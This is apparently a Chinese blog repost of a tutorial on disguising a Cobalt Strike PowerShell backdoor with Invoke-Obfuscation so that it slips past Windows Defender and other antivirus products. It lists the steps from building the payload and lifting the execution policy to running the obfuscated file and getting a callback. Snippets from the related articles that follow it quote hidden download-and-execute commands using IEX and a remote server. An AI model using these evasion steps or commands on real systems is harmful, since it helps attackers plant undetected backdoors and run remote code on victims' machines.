Invoke-Obfuscation混淆ps文件绕过Windows_Defender

最新推荐文章于 2024-09-08 08:32:17 发布
转载 最新推荐文章于 2024-09-08 08:32:17 发布 · 788 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/sstfy/p/10440301.html

本文介绍如何使用CobaltStrike和Invoke-Obfuscation工具创建混淆的PowerShell后门文件,实现绕过杀毒软件,并提供了解决Win10 x64系统中脚本运行限制的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前提

powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。
所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

混淆

  • 1.Cobaltstrike制作ps1后门文件
  • 2.进入Invoke-Obfuscation
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

981809-20190226212215011-1115057415.png

可能会报错?!
win10 x64系统 Import-Module 无法加载文件,提示此系统上禁止运行脚本。
981809-20190226212227106-1871288307.png

解决
管理员权限下运行:Set-ExecutionPolicy Unrestricted
981809-20190226212233804-1068383291.png

  • 3.设置ps1文件进行混淆
set scriptpath E:\...\Invoke-Obfuscation_PowerShell\payload.ps1
encoding
1

981809-20190226212242661-1388071176.png

  • 4.输出文件
    out 1.ps1
    981809-20190226212250337-717112939.png

然后运行 powershell 1.ps1./1.ps1,接收端就上线了。

上线

981809-20190226212258385-1117307065.png

powershell是一款很强大的工具,且很多原生不经过任何处理的ps后门文件都能轻松绕过杀软。如不使用,对于安全意识较弱的同学可以删除系统 powershell.exe 程序。

转载于:https://www.cnblogs.com/sstfy/p/10440301.html

[网络安全提高篇] 一二九.Powershell恶意代码检测 (5)混淆和反混淆 [上]
杨秀璋的专栏
04-09 540
前文介绍了如何利用MS Defender实现恶意样本家族批量标注。这篇文章将继续讲解Powershell恶意代码检测,主要包括PowerShell混淆与反混淆内容,首先结合Invoke-Obfuscation工具详细介绍PowerShell代码混淆方法,再结合PowerDecode工具阐述解混淆方法。该研究将为后续的恶意软件家族分类或溯源提供帮助。未完待续,基础性文章,希望您喜欢,且看且珍惜。
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
热门推荐
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
qq_53058639的博客
07-29 344
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyOoLh6y-1690608873080)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-b1JMsAWY-1690608873081)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ALyXvPFo-1690608873083)(data:image/gif;因此,Invoke-
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1500
坑点:window11行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2849
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
Invoke-Obfuscation混淆免杀过360和火绒
crowsec
06-01 2242
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
【亲测免费】 Invoke-Obfuscation 安装及使用教程
gitblog_00357的博客
08-08 553
Invoke-Obfuscation 安装及使用教程 1. 项目目录结构及介绍 在 Invoke-Obfuscation 的源代码仓库中,主要的目录和文件包括: src - 包含 Invoke-Obfuscation.ps1 和 Invoke-Obfuscation.psm1 主要功能脚本。 Examples - 提供了示例脚本来展示如何使用该项目。 Tests - 单元测试用例,用于验证各种o...
1.利用Powershell相关命令执行如下功能: .查看并修改执行策略; · 检查 Microsoft Defender 状态; · 查询 Microsoft Defender 所有可用首选项; · 开启/关闭 杀毒软件和防火墙; ·使用Invoke-Expression、Invoke、 NewScriptBlock、Invoke-Command等命令执行远程下载功能; · 用IEX 远程下载并绕过权限执行; · 隐藏绕过权限执行。
03-31
混淆后的脚本可绕过Windows Defender静态检测[^3]。 - **非落地执行**: 通过管道符直接运行远程脚本: ```powershell (New-Object Net.WebClient).DownloadString('URL') | IEX ``` 或通过其他进程加载(如`...
powershell混淆PS2EXE打包:绕过主流杀软的实战教程
在本文中,我们讨论了一种名为"Invoke-Obfuscation-Bypass + PS2EXE"的技术,这是一种针对Windows PowerShell脚本的绕过主流安全软件策略的方法。该技术利用PowerShell脚本的混淆技术和PS2EXE工具,旨在隐藏恶意代码...
msf win10漏洞_渗透测试 - 黑客技术 | win10内存执行meterpreter绕过杀软第二弹_吾爱漏洞...
weixin_40007804的博客
12-22 1051
坎宁汉姆的定律是这样的:“在互联网上获得正确答案的最好方法并是去问一个问题,而是发布一个错误的答案”。然而,自从我发布上篇博文《win10内存花式执行meterpreter绕过杀软》后却没有收到负面反馈,过我自己已经发现了一些问题:以下是我目前为止发现的:l绝大多数杀软使用默认配置就能检测到nps_payload,因为它在后端使用了msfvenom来生成可执行的powershell代码。l从w...
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软Invoke-Obfuscation-Bypass + PS2EXE 绕过主流
【亲测免费】 PowerShell脚本混淆工具:Invoke-PSObfuscation 使用教程
gitblog_00077的博客
09-08 975
PowerShell脚本混淆工具:Invoke-PSObfuscation 使用教程 项目概述 请注意,您提供的链接指向的项目似乎并非是预期的 "Invoke-PSObfuscation",而原始请求中提及的是 "Invoke-Obfuscation",且指向了一个同的GitHub仓库路径。然而,由于指定的链接正确且对应于存在的项目,我将基于典型的开源...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2982
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
渗透测试-window反弹shell
lza20001103的博客
05-11 5334
window反弹shell
Invoke-Obfuscation 使用教程
gitblog_00312的博客
08-08 641
Invoke-Obfuscation 使用教程 Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation 项目介绍 Invoke-Obfuscation 是一个用于混淆 PowerShell 脚本的工具,旨在帮助用户理解和应用混淆技术,以绕过基于签名的检测机制。...
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
AA8j的博客
07-06 2670
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershell: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
kali invoke-obfuscation工具使用
最新发布
06-10
Invoke-Obfuscation 是一个功能强大的工具,用于混淆 PowerShell 脚本的同组件,从而绕过防病毒软件和安全检测机制[^1]。以下是关于如何在 Kali Linux 环境中安装和使用 Invoke-Obfuscation 的详细说明。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值